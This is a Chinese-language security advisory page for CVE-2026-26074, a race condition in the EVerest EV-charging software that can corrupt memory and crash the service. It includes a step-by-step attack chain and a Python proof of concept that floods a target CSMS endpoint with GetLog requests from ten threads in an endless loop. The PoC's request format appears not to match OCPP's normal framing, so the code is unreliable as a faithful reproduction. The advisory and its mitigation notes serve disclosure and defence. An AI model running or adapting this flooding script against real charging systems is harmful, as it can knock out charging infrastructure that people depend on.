CVE-2026-26074 CVSS 7.0 高危

CVE-2026-26074 EVerest数据竞争导致内存破坏漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-26074

漏洞类型

竞态条件

CVSS评分

7.0 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

EVerest

漏洞概述

EVerest是一款电动汽车充电软件栈。在2026.02.0版本之前，由于缺乏同步机制，存在数据竞争漏洞。攻击者可利用CSMS网络请求与EVSE物理故障事件同时触发，导致对共享队列的并发访问，进而引发内存损坏和系统崩溃。

技术细节

该漏洞源于EVerest在处理多线程并发事件时的逻辑缺陷。具体而言，当CSMS系统发送GetLog或UpdateFirmware请求（网络触发）与EVSE发生物理故障事件（物理触发）在时间上重叠时，会导致多线程对`std::map<std::queue>`容器中的`event_queue`进行非线程安全的并发读写。这种数据竞争破坏了内存操作的原子性，可能导致STL容器内部结构损坏。TSAN（ThreadSanitizer）报告明确指出了对`event_queue`的并发访问违规。攻击者可通过高频网络请求增加竞态窗口，从而提高触发漏洞导致拒绝服务（DoS）的概率。

攻击链分析

STEP 1

1. 侦察

攻击者识别并定位暴露在互联网上的EVerest CSMS管理接口。

STEP 2

2. 触发网络请求

攻击者向目标CSMS发送大量的GetLog或UpdateFirmware请求，占用系统资源并触发相关代码路径。

STEP 3

3. 诱导并发事件

等待或诱导EVSE硬件发生故障事件（如物理断开），或在特定时间节点模拟该事件，使其与网络请求的处理时间重叠。

STEP 4

4. 触发竞态条件

网络请求处理线程与硬件事件处理线程同时访问`event_queue`，导致数据竞争，破坏内存结构。

STEP 5

5. 实施攻击

利用数据竞争导致服务崩溃（DoS），或在特定条件下实现进一步的内存破坏。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import threading
import time

# Target EVerest CSMS endpoint
target_url = "http://target-everest-csms:8888/OCPP/201"
headers = {'Content-Type': 'application/json'}

# Malicious payload to trigger network request
def send_network_request():
    payload = {
        "messageType": 2,
        "command": "GetLog",
        "payload": {
            "logType": "DiagnosticsLog",
            "requestId": 12345
        }
    }
    try:
        # Send request repeatedly to increase chance of race condition
        while True:
            response = requests.post(target_url, json=payload, headers=headers, timeout=5)
            print(f"Sent request, status: {response.status_code}")
            time.sleep(0.1)
    except Exception as e:
        print(f"Error sending request: {e}")

# Simulating the race condition scenario
# Note: Physical EVSE fault event is hard to simulate purely via code,
# but this script stresses the network interface to overlap with potential physical triggers.
if __name__ == "__main__":
    threads = []
    for i in range(10):
        t = threading.Thread(target=send_network_request)
        threads.append(t)
        t.start()
    
    for t in threads:
        t.join()

影响范围

EVerest < 2026.02.0

防御指南

临时缓解措施

如果不能立即升级，建议限制外部对CSMS接口的访问权限，仅允许可信IP连接，并监控EVSE硬件事件日志，在出现异常时重启服务以清除潜在的内存损坏状态。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表